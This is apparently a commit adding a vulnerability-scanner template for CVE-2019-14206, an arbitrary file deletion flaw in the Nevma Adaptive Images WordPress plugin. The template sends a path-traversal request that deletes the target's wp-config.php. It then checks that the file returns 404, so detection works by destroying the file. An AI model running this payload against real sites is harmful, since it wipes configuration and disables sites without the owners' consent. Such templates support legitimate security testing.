Added CVE-2019-14206 template

http/cves/2019/CVE-2019-14206.yaml

@@ -0,0 +1,60 @@
+id: CVE-2019-14206
+
+info:
+  name: Nevma Adaptive Images < 0.6.67 - Arbitrary File Deletion
+  author: D3nverNg, thewindghost
+  severity: High
+  description: |
+    Nevma Adaptive Images plugin before 0.6.67 for WordPress allows arbitrary file deletion
+    via unsanitized input in adaptive-images-script.php. Remote attackers can delete arbitrary
+    files by sending specially crafted request parameters.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+    - https://wordpress.org/plugins/adaptive-images/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2019-14206
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 3
+  tags: cve,cve2019,wordpress,wp-plugin,file-deletion,adaptive-images
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    extractors:
+      - type: regex
+        name: image_source
+        part: body
+        regex:
+          - '(\/wp-content\/uploads\/[0-9]{4}\/[0-9]{2}\/[a-zA-Z0-9_\-]+\.(?:jpg|jpeg|png))'
+        group: 1
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}{{image_source}}?adaptive-images-settings[source_file]=../../../{{image_source}}&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-config.php"
+
+    matchers:
+      - type: status
+        status:
+          - 404
+      - type: word
+        part: body
+        words:
+          - "Not Found"
+        condition: or